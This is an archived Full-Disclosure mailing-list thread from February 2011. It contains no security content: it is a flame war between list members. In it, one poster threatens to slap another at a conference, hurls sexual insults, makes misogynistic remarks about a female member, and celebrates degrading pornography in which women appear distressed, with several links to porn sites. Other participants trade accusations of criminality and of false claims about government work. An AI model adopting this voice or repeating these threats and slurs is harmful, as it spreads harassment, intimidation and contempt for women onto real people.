> >> On Thu, Feb 17, 2011 at 6:19 PM, andrew.wallace
> >>  wrote:
> >>>
> >>> On Thu, Feb 17, 2011 at 6:05 PM, Cal Leeming [Simplicity Media Ltd]
> >>>  wrote:
> >>> > Ah, now this is a different subject entirely! It suits some, but not
> >>> > others.
> >>>
> >>> Are you trying to distract the many police forces throughout the UK who
> >>> are subscribed to the list that you made a threat of violence towards a
> >>> prominent figure in the security community?
> >>>
> >>> On Thu, Feb 17, 2011 at 5:35 PM, Cal Leeming [Simplicity Media Ltd]
> >>>  wrote:
> >>> > I hope you turn up at my next conference, so I can slap the fuck out
> of
> >>> > you
> >>> > in front of everyone.
> >>> > Little bitch like you would probably go running to the police as
> well.
> >>>
> >>> Obviously, criminals are reported to the police. The problem here is,
> >>> this list is already populated with police forces throughout the UK.
> >>>
> >>> They may even ask me to attend the next conference you appear at, and
> >>> then cuff you as soon as you lay a hand on me.
> >>>
> >>> Cal Leeming, the so-called reformed criminal ends up back in court and
> >>> infront of the media glare.
> >>>
> >>> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

HOLY SHIT.

Most awesome idea ever.

Every time Andrew posts, I'll respond with more epic porn clips, each more
shocking than the last. For every cloud has a silver lining? :D

On Thu, Feb 17, 2011 at 6:19 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Thu, Feb 17, 2011 at 6:05 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > Ah, now this is a different subject entirely! It suits some, but not
> > others.
>
> Are you trying to distract the many police forces throughout the UK who are
> subscribed to the list that you made a threat of violence towards a
> prominent figure in the security community?
>
> On Thu, Feb 17, 2011 at 5:35 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > I hope you turn up at my next conference, so I can slap the fuck out of
> you
> > in front of everyone.
> > Little bitch like you would probably go running to the police as well.
>
> Obviously, criminals are reported to the police. The problem here is, this
> list is already populated with police forces throughout the UK.
>
> They may even ask me to attend the next conference you appear at, and then
> cuff you as soon as you lay a hand on me.
>
> Cal Leeming, the so-called reformed criminal ends up back in court and
> infront of the media glare.
>
> Andrew
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

Seems this has now gone very very very far off topic.

Here's two more great links:

(non porn but amusing) http://bit.ly/e7duHa
(great episode (tecey) from facialabuse) http://bit.ly/fTXhF6
(another great episode from facialabuse) http://bit.ly/fgrMb7

Embrace it /b/rothers :D

On Thu, Feb 17, 2011 at 6:05 PM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

> Ah, now this is a different subject entirely! It suits some, but not
> others.
>
> Personally, I think there's nothing better (porn wise) than seeing the sad
> look on a dumb broads face after she realized what she's just done. Or even
> better, the constant sad look on her face when she's doing the scene, and
> you know she's only doing it for the money, and that it's her first time,
> and probably her last. Mind you, working on facialabuse.com has pretty
> much desensitized me to *everything* (check out the Tecey video, classic
> example!). Maybe check out the front page video for 
> http://bit.ly/1KTVJv(xxxlubetube), I gotta admit that did kinda make me go 
> "eww".
>
> And another thing, no matter how bad a recession is, there will *always* be
> a market for sex and porn. No matter if someone loses their job, their home,
> their wife and kids etc, their hand and the internet will be a steady friend
> for them. It helps save marriages because it gives the individual a means of
> escape and fantasy, without resorting to cheating.
>
>
>
> On Thu, Feb 17, 2011 at 5:56 PM, phocean <0...@phocean.net> wrote:
>
>> If so, I sincerely feel sorry for you :(
>> This shit can really destroy your life if you are not careful and loose
>> sight of important things of life. Good luck !
>>
>> Le jeudi 17 février 2011 à 17:47 +, Cal Leeming [Simplicity Media
>> Ltd] a écrit :
>> > Considering for the last 18 months my work has been primarily in adult
>> > content, and I have to deal with sexual/immature/aggressive bullshit
>> > on a daily basis, I think this was a reasonable response. lol.
>> >
>>
>>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

Prominent figure? LMFAO. As for threat of violence, go suck my nice juicy
hairy ball sack :)


>
> On Thu, Feb 17, 2011 at 6:19 PM, andrew.wallace <
> andrew.wall...@rocketmail.com> wrote:
>
>> On Thu, Feb 17, 2011 at 6:05 PM, Cal Leeming [Simplicity Media Ltd] <
>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>> > Ah, now this is a different subject entirely! It suits some, but not
>> > others.
>>
>> Are you trying to distract the many police forces throughout the UK who
>> are subscribed to the list that you made a threat of violence towards a
>> prominent figure in the security community?
>>
>> On Thu, Feb 17, 2011 at 5:35 PM, Cal Leeming [Simplicity Media Ltd] <
>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>> > I hope you turn up at my next conference, so I can slap the fuck out of
>> you
>> > in front of everyone.
>> > Little bitch like you would probably go running to the police as well.
>>
>> Obviously, criminals are reported to the police. The problem here is, this
>> list is already populated with police forces throughout the UK.
>>
>> They may even ask me to attend the next conference you appear at, and then
>> cuff you as soon as you lay a hand on me.
>>
>> Cal Leeming, the so-called reformed criminal ends up back in court and
>> infront of the media glare.
>>
>> Andrew
>>
>>
>>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

i.just.watched.a.dumb.broad.get.owned.at.facialabuse.com

Maybe if I ask the client reallly nicely, he'll let me add that A record
:D

2011/2/17 Thor (Hammer of God) 

>  Suddenly, I see a whole new market for the domain name you and I were
> going to get J  I need to check on that…
>
> t
>
>
>
> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Cal Leeming
> [Simplicity Media Ltd]
> *Sent:* Thursday, February 17, 2011 10:06 AM
> *To:* phocean
> *Cc:* """full-disclosure@lists.grok.org.uk"""; andrew.wallace
> *Subject:* [Full-disclosure] (this thread is now about porn).‏
>
>
>
> Ah, now this is a different subject entirely! It suits some, but not
> others.
>
>
>
> Personally, I think there's nothing better (porn wise) than seeing the sad
> look on a dumb broads face after she realized what she's just done. Or even
> better, the constant sad look on her face when she's doing the scene, and
> you know she's only doing it for the money, and that it's her first time,
> and probably her last. Mind you, working on facialabuse.com has pretty
> much desensitized me to *everything* (check out the Tecey video, classic
> example!). Maybe check out the front page video for 
> http://bit.ly/1KTVJv(xxxlubetube), I gotta admit that did kinda make me go 
> "eww".
>
>
>
> And another thing, no matter how bad a recession is, there will *always* be
> a market for sex and porn. No matter if someone loses their job, their home,
> their wife and kids etc, their hand and the internet will be a steady friend
> for them. It helps save marriages because it gives the individual a means of
> escape and fantasy, without resorting to cheating.
>
>
>
>
>
>
>
> On Thu, Feb 17, 2011 at 5:56 PM, phocean <0...@phocean.net> wrote:
>
> If so, I sincerely feel sorry for you :(
> This shit can really destroy your life if you are not careful and loose
> sight of important things of life. Good luck !
>
> Le jeudi 17 février 2011 à 17:47 +, Cal Leeming [Simplicity Media
> Ltd] a écrit :
>
> > Considering for the last 18 months my work has been primarily in adult
> > content, and I have to deal with sexual/immature/aggressive bullshit
> > on a daily basis, I think this was a reasonable response. lol.
> >
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

Ah, now this is a different subject entirely! It suits some, but not
others.

Personally, I think there's nothing better (porn wise) than seeing the sad
look on a dumb broads face after she realized what she's just done. Or even
better, the constant sad look on her face when she's doing the scene, and
you know she's only doing it for the money, and that it's her first time,
and probably her last. Mind you, working on facialabuse.com has pretty much
desensitized me to *everything* (check out the Tecey video, classic
example!). Maybe check out the front page video for
http://bit.ly/1KTVJv(xxxlubetube), I gotta admit that did kinda make
me go "eww".

And another thing, no matter how bad a recession is, there will *always* be
a market for sex and porn. No matter if someone loses their job, their home,
their wife and kids etc, their hand and the internet will be a steady friend
for them. It helps save marriages because it gives the individual a means of
escape and fantasy, without resorting to cheating.



On Thu, Feb 17, 2011 at 5:56 PM, phocean <0...@phocean.net> wrote:

> If so, I sincerely feel sorry for you :(
> This shit can really destroy your life if you are not careful and loose
> sight of important things of life. Good luck !
>
> Le jeudi 17 février 2011 à 17:47 +, Cal Leeming [Simplicity Media
> Ltd] a écrit :
> > Considering for the last 18 months my work has been primarily in adult
> > content, and I have to deal with sexual/immature/aggressive bullshit
> > on a daily basis, I think this was a reasonable response. lol.
> >
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

[Cal Leeming [Simplicity Media Ltd]]

Considering for the last 18 months my work has been primarily in adult
content, and I have to deal with sexual/immature/aggressive bullshit on a
daily basis, I think this was a reasonable response. lol.

Sometimes, people really do just deserve a slap. Tho, I doubt Andew will
ever surface irl :S

On Thu, Feb 17, 2011 at 5:43 PM, phocean <0...@phocean.net> wrote:

> Can you please stop insulting and using {agressive, immature, sexual...}
> oriented words.
> Too much is too much. Relax, take a deep breath outside and let's go
> back to the real stuff.
> Thanks.
>
> Le jeudi 17 février 2011 à 17:38 +0000, Cal Leeming [Simplicity Media
> Ltd] a écrit :
> > I don't give a fuck tbh, I really don't.
> >
> > On Thu, Feb 17, 2011 at 5:38 PM, Benji  wrote:
> > Probably a bad idea to threaten violence, just sayin'
> >
> >
> > Also what conferences would these be? hak5 learn-to-pwn?
> >
> >
> > On Thu, Feb 17, 2011 at 5:35 PM, Cal Leeming [Simplicity Media
> > Ltd]  wrote:
> >
> >
> > I hope you turn up at my next conference, so I can
> > slap the fuck out of you in front of everyone.
> >
> >
> > Little bitch like you would probably go running to the
> > police as well.
> >
> >
> > On Thu, Feb 17, 2011 at 5:28 PM, andrew.wallace
> >  wrote:
> > On Thu, Feb 17, 2011 at 4:27 PM, Paul Schmehl
> >  wrote:
> > > Does anyone on this list really give a crap
> > that you guys like publicly
> >     > pulling your puds?
> > >
> > > At some point in life, most people grow up.
> >
> >
> > On Thu, Feb 17, 2011 at 4:57 PM, Cal Leeming
> > [Simplicity Media Ltd]
> >  wrote:
> >
> > > I disagree. Unless you are the bitch who
> > hands out the tea and biscuits.
> >
> >
> > Like Paul said, you have a lot of growing up
> > to do, that's why people want you off the
> > list.
> >
> > Andrew
> >
> >
> >
> >
> >
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter:
> > http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

[Cal Leeming [Simplicity Media Ltd]]

I don't give a fuck tbh, I really don't.

On Thu, Feb 17, 2011 at 5:38 PM, Benji  wrote:

> Probably a bad idea to threaten violence, just sayin'
>
> Also what conferences would these be? hak5 learn-to-pwn?
>
> On Thu, Feb 17, 2011 at 5:35 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> I hope you turn up at my next conference, so I can slap the fuck out of
>> you in front of everyone.
>>
>> Little bitch like you would probably go running to the police as well.
>>
>>
>> On Thu, Feb 17, 2011 at 5:28 PM, andrew.wallace <
>> andrew.wall...@rocketmail.com> wrote:
>>
>>> On Thu, Feb 17, 2011 at 4:27 PM, Paul Schmehl 
>>> wrote:
>>> > Does anyone on this list really give a crap that you guys like publicly
>>> > pulling your puds?
>>> >
>>> > At some point in life, most people grow up.
>>>
>>> On Thu, Feb 17, 2011 at 4:57 PM, Cal Leeming [Simplicity Media Ltd] <
>>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>> > I disagree. Unless you are the bitch who hands out the tea and
>>> biscuits.
>>>
>>> Like Paul said, you have a lot of growing up to do, that's why people
>>> want you off the list.
>>>
>>> Andrew
>>>
>>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

[Cal Leeming [Simplicity Media Ltd]]

I hope you turn up at my next conference, so I can slap the fuck out of you
in front of everyone.

Little bitch like you would probably go running to the police as well.

On Thu, Feb 17, 2011 at 5:28 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Thu, Feb 17, 2011 at 4:27 PM, Paul Schmehl 
> wrote:
> > Does anyone on this list really give a crap that you guys like publicly
> > pulling your puds?
> >
> > At some point in life, most people grow up.
>
> On Thu, Feb 17, 2011 at 4:57 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > I disagree. Unless you are the bitch who hands out the tea and biscuits.
>
> Like Paul said, you have a lot of growing up to do, that's why people want
> you off the list.
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

[Cal Leeming [Simplicity Media Ltd]]

I disagree. Unless you are the bitch who hands out the tea and biscuits.

On Thu, Feb 17, 2011 at 4:55 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Thu, Feb 17, 2011 at 4:49 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > No, it was you that made suggestions that you potentially did work for
> the
> > government.
>
> Absolutely not, I said I'm the founder of a consortium who meet to have
> roundtable discussions between the public and private sector.
>
> It's in black and white on our web site.
>
> Andrew
>
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

[Cal Leeming [Simplicity Media Ltd]]

No, it was you that made suggestions that you potentially did work for the
government.

I cba to argue with your trolling any more dude, go suck a cock :)

On Thu, Feb 17, 2011 at 4:47 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Thu, Feb 17, 2011 at 4:31 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > I bet you never even used the term "local authority" until I posted it
> just
> > then lol.
> > As for 'central government organisation' in Cheltenham, you are most
> > likely referring to GCHQ and/or the new department that was branched off
> > from it to deal with cyber crime. If this is the case, then you are going
> to
> > be taught a very serious lesson from one of the risk assessment officers.
> > Even hinting that you have involvements with GCHQ outside of you duties
> > (unless you are an MP making a public statement), is grounds to have your
> > employment/contract suspended and/or terminated.
> > Seriously mate, I know the score when it comes to this area, and I don't
> > even for a second the bullshit you are peddling.
>
> I don't have involvement with them, it was "James Rankin" who was claiming
> to work for the government. However, he hasn't heard of me and I haven't
> heard of him. So its likely he is the one feeding both of us with fairy tale
> stories about his position in government.
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

[Cal Leeming [Simplicity Media Ltd]]

I bet you never even used the term "local authority" until I posted it just
then lol.

As for 'central government organisation' in Cheltenham, you are most
likely referring to GCHQ and/or the new department that was branched off
from it to deal with cyber crime. If this is the case, then you are going to
be taught a very serious lesson from one of the risk assessment officers.
Even hinting that you have involvements with GCHQ outside of you duties
(unless you are an MP making a public statement), is grounds to have your
employment/contract suspended and/or terminated.

Seriously mate, I know the score when it comes to this area, and I don't
even for a second the bullshit you are peddling.

On Thu, Feb 17, 2011 at 4:26 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Thu, Feb 17, 2011 at 4:11 PM, James Rankin 
> wrote:
> > I don't want to be invited for cross-dressing talks with you, you
> delusional
> > moron
> >
> > Get back down the pub.
> >
> > A long way to go? I make good money from my career, matey. (Career. Ever
> > heard of one?) You on the other hand are firmly wedged in cloud-cuckoo. I
> > work for the government at the minute, and no-one here has ever heard of
> > you.
> >
> > Goodnight.
>
> Perhaps you work for a local government authority, however you aren't
> involved with any central government organisation in Cheltenham or London.
>
> The way you talk to people, you are unlikely to be involved in anything
> meaningful within the government, perhaps a local authority though.
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

[Cal Leeming [Simplicity Media Ltd]]

Obviously.

On Thu, Feb 17, 2011 at 3:36 PM, Kain, Rebecca (.)  wrote:

>  I had sex with him, obviously.  that's how he got my picture to post here
>
> -becki
>
>
>  --
> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Cal Leeming
> [Simplicity Media Ltd]
> *Sent:* Thursday, February 17, 2011 10:33 AM
> *To:* PsychoBilly
> *Cc:* fdisclo
> *Subject:* Re: [Full-disclosure]from hbgary: stuxnet, WL attack, Psyop and
> Anonymous trackdown‏
>
> Has anyone here actually met Andrew (if that's his name) irl?
>
> On Thu, Feb 17, 2011 at 3:01 PM, PsychoBilly  wrote:
>
>> tss tss
>> appearence of a thesis
>> but stuffed with approximations
>> IE p.15
>> " and �Unix Terrorist� is likely European. "
>>
>>
>>
>> [[ � Cal Leeming [Simplicity Media Ltd] � ]] @ [[ � 17/02/2011 15:01 �
>> ]]--
>> > I refer everyone to:
>> >
>> >
>> http://docs.google.com/viewer?a=v&q=cache:OWQrHOa0wlYJ:www.hackerfactor.com/papers/who_is_n3td3v.pdf+n3td3v&hl=en&gl=uk&pid=bl&srcid=ADGEESgOXeElYqoYkhojj9qtZ3bPDRiy_2OMLyhlaOqW6If-yK4-eLXAZQ4Yw3TGMl0YQFIwSmB0QbQmAjsnuZf8lmGMdXQrKwsWd8CtM7iO6xc4zSs621RgeFXvg-ueRsE5R1D5ENGv&sig=AHIEtbQlx0J-_J8eIS6lzxmFJJ0nQz23iw
>> > <
>> http://docs.google.com/viewer?a=v&q=cache:OWQrHOa0wlYJ:www.hackerfactor.com/papers/who_is_n3td3v.pdf+n3td3v&hl=en&gl=uk&pid=bl&srcid=ADGEESgOXeElYqoYkhojj9qtZ3bPDRiy_2OMLyhlaOqW6If-yK4-eLXAZQ4Yw3TGMl0YQFIwSmB0QbQmAjsnuZf8lmGMdXQrKwsWd8CtM7iO6xc4zSs621RgeFXvg-ueRsE5R1D5ENGv&sig=AHIEtbQlx0J-_J8eIS6lzxmFJJ0nQz23iw
>> >
>> >
>> >
>>
>>  ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

[Cal Leeming [Simplicity Media Ltd]]

Has anyone here actually met Andrew (if that's his name) irl?

On Thu, Feb 17, 2011 at 3:01 PM, PsychoBilly  wrote:

> tss tss
> appearence of a thesis
> but stuffed with approximations
> IE p.15
> " and “Unix Terrorist” is likely European. "
>
>
>
> [[   Cal Leeming [Simplicity Media Ltd]   ]] @ [[   17/02/2011 15:01
> ]]--
> > I refer everyone to:
> >
> >
> http://docs.google.com/viewer?a=v&q=cache:OWQrHOa0wlYJ:www.hackerfactor.com/papers/who_is_n3td3v.pdf+n3td3v&hl=en&gl=uk&pid=bl&srcid=ADGEESgOXeElYqoYkhojj9qtZ3bPDRiy_2OMLyhlaOqW6If-yK4-eLXAZQ4Yw3TGMl0YQFIwSmB0QbQmAjsnuZf8lmGMdXQrKwsWd8CtM7iO6xc4zSs621RgeFXvg-ueRsE5R1D5ENGv&sig=AHIEtbQlx0J-_J8eIS6lzxmFJJ0nQz23iw
> > <
> http://docs.google.com/viewer?a=v&q=cache:OWQrHOa0wlYJ:www.hackerfactor.com/papers/who_is_n3td3v.pdf+n3td3v&hl=en&gl=uk&pid=bl&srcid=ADGEESgOXeElYqoYkhojj9qtZ3bPDRiy_2OMLyhlaOqW6If-yK4-eLXAZQ4Yw3TGMl0YQFIwSmB0QbQmAjsnuZf8lmGMdXQrKwsWd8CtM7iO6xc4zSs621RgeFXvg-ueRsE5R1D5ENGv&sig=AHIEtbQlx0J-_J8eIS6lzxmFJJ0nQz23iw
> >
> >
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

[Cal Leeming [Simplicity Media Ltd]]

Andrew, have you even looked at my linkedin profile?

I designed and implemented an embedded router (from scratch) directly for a
local authority in the UK for UTMS (Urban Traffic Management System). I also
gave a private conference (where I was the *only* speaker) of which there
were 40 attendees from large financial institutions, NCS (National Crime
Squad, now known as SOCA) and APACS.

For example, I doubt you have even heard of QnetiQ, let alone had any
involvement with them :S

On Thu, Feb 17, 2011 at 2:50 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Thu, Feb 17, 2011 at 2:20 PM, James Rankin 
> wrote:
> > No-one in the UK or UK security community has heard of Nettie or his
> > consultancy.
> >
> > He's just a deluded Jocko pisspot
>
> I've been a member for the last 12 years and frequent industry conferences
> regularly, as well as chair roundtable discussions between the sectors. I
> doubt you've ever been involved in any of that, because speaking to me in
> the manner you are, you are unlikely to be invited for cross-industry talks
> with anyone.
>
> Learn to respect others and get on with people instead of posting abusive
> messages to mailing lists, and you may get invited into talks between the
> government and the private sector.
>
> Judging by your email though it seems you have a long way to go.
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

[Cal Leeming [Simplicity Media Ltd]]

I refer everyone to:

http://docs.google.com/viewer?a=v&q=cache:OWQrHOa0wlYJ:www.hackerfactor.com/papers/who_is_n3td3v.pdf+n3td3v&hl=en&gl=uk&pid=bl&srcid=ADGEESgOXeElYqoYkhojj9qtZ3bPDRiy_2OMLyhlaOqW6If-yK4-eLXAZQ4Yw3TGMl0YQFIwSmB0QbQmAjsnuZf8lmGMdXQrKwsWd8CtM7iO6xc4zSs621RgeFXvg-ueRsE5R1D5ENGv&sig=AHIEtbQlx0J-_J8eIS6lzxmFJJ0nQz23iw


On Thu, Feb 17, 2011 at 1:51 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Wed, Feb 16, 2011 at 5:54 PM, Old Timer  wrote:
> > andrew:
> >
> > "Cal is a blackhat with criminal convictions, I hope he is forced from
> the
> > list by an uprising of whitehats.
> >
> > I'm a whitehat and its upsetting to see the disclosure community being
> taken
> > over by criminals.
> >
> > Andrew"
> >
> >
> > hahahah
> >
> > Why don't you have a quick glance at the list charter and see who founded
> > this list ?  Then go look them up in wikipedia
> >
> > While yer at it, check out Scott Chasin, who founded bugtraq...
> >
> > And 8lgm, who were prolific bugtraq posters...
> >
> > the list goes on and on (and on and on).  How old are you, son ?
>
> n3td3v - Brief history of the consortium and timeline
>
> How We Started
>
> * Founded by entrepreneur and IT Security Consultant, Andrew Wallace.
>
> * The aged 30-something year old was born in 1981 and started the
> consultancy at the young age of 18.
>
> * n3td3v - IT Security Consultancy was founded in 1999 and helped the
> entrepreneur launch his career in IT Security.
>
> * Today, 2011, we are one of the most well known non-profit IT Security
> consortia in the UK.
>
> Learn more: https://sites.google.com/site/n3td3v/
>
> Andrew
>
>
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

[Cal Leeming [Simplicity Media Ltd]]

Go and fuck yourself. Hard.

On Wed, Feb 16, 2011 at 7:42 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Wed, Feb 16, 2011 at 4:20 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > Come at me bro. :D
>
> The security and intelligence community in the UK do not appreciate this
> comment, I ask you to cease and desist with immediate effect.
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

[Cal Leeming [Simplicity Media Ltd]]

Come at me bro. :D

On Wed, Feb 16, 2011 at 4:18 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Wed, Feb 16, 2011 at 3:20 PM, huj huj huj  wrote:
> > caldouche you look spiffy in a dress
>
> Cal is a blackhat with criminal convictions, I hope he is forced from the
> list by an uprising of whitehats.
>
> I'm a whitehat and its upsetting to see the disclosure community being
> taken over by criminals.
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

[Cal Leeming [Simplicity Media Ltd]]

Why thank you :D

On Wed, Feb 16, 2011 at 3:20 PM, huj huj huj  wrote:

> caldouche you look spiffy in a dress
>
> 2011/2/15 Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk>
>
>
>> http://a1.l3-images.myspacecdn.com/images01/49/3fb5839feabb972e4b40c2807e328396/l.jpg
>>
>> Rule 34. Now.
>>
>>
>> On Tue, Feb 15, 2011 at 9:13 PM, Cal Leeming [Simplicity Media Ltd] <
>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>
>>> I now also declare rule 34.
>>>
>>> On Tue, Feb 15, 2011 at 9:10 PM, Eyeballing Weev <
>>> eyeballing.w...@gmail.com> wrote:
>>>
>>>> You look really good in heels and a skirt, nice legs also.
>>>>
>>>> On 02/15/2011 04:08 PM, Kain, Rebecca (.) wrote:
>>>> > Of course that's where I got it from.  A woman couldn't be *that*
>>>> > creative
>>>> >
>>>> >
>>>>
>>>>
>>>>  ___
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>
>>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

[Cal Leeming [Simplicity Media Ltd]]

I now also declare rule 34.

On Tue, Feb 15, 2011 at 9:10 PM, Eyeballing Weev
wrote:

> You look really good in heels and a skirt, nice legs also.
>
> On 02/15/2011 04:08 PM, Kain, Rebecca (.) wrote:
> > Of course that's where I got it from.  A woman couldn't be *that*
> > creative
> >
> >
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

[Cal Leeming [Simplicity Media Ltd]]

I declare rule 31 on Rebecca.

( As you are a girl, and therefore are unaware of the rules of the internet,
please may I direct your attention to
http://encyclopediadramatica.com/Rules_of_the_Internet )

On Tue, Feb 15, 2011 at 9:08 PM, Kain, Rebecca (.)  wrote:

> Of course that's where I got it from.  A woman couldn't be *that*
> creative
>
>
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Randal
> T. Rioux
> Sent: Tuesday, February 15, 2011 4:05 PM
